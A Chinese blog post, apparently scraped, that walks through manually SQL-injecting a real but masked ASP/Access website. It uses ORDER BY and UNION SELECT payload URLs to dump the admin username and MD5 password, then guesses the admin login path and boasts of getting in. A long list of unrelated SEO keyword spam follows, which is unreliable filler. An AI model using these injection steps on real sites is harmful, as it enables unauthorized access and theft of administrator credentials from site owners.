【实战】利用联合查询--手工SQL注入拿下网站
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。目标网址:http://www.******.com/about.a
千家信息网最后更新 2025年12月01日【实战】利用联合查询--手工SQL注入拿下网站
看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。
目标网址:http://www.******.com/about.asp?id=1
1.首先确认这里是否存在整型注入,很简单,url后加' and 1=1 and 1=2,不细说。同时我们还判断出这是Access的数据库。
2.利用order by判断表项有几个;
http://www.******.com/about.asp?id=1 order by 4(这里的5报错,4正确,就是4个了)
3.然后测试显示位,2,3位可显;
http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin
4.在显示位猜测字段值;这里的表名,字段名根据经验来试;常见的就那几种;我们得到了用户名和密码(MD5加密的);
http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin
5.拿到用户名密码后,寻找后台,常见的admin/login/manager/admin_login等可以试一试,成功登陆,搞定。提权后面再说咯。
后台
字段
密码
小子
常见
用户
用户名
手工
网站
重要
成功
同时
基础
就是
工具
数据
数据库
目标
穿山甲
站点
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
2017网络安全教育日
软件开发技术主管待遇
开发一款查询数据库app
龙树互联网科技(上海)
2020网络安全展会时间
信息网络安全监督专业
mvc3 连接数据库
易语言选择框数据库
金翼联合网络技术有限公司
戴尔r720xd服务器指示灯
建筑行业安全风险清单和数据库
vba如何连接ftp上的数据库
杨浦区手机软件开发
英雄联盟台服连不上服务器
网络安全漏洞攻击
郑州前端软件开发费用是多少
数据库设计订单表的列名
小红伞代理服务器
浪潮和联想服务器
java开源服务器
服务器技术
富士康是几几年做服务器的
热血江湖怎么看手游服务器
高速传输网络技术有哪些
工厂报表软件开发
阿克苏服务器机柜
组态王历史数据库在哪里找到
泰和软件开发商
oracle数据库xtu
上海app软件开发有几家
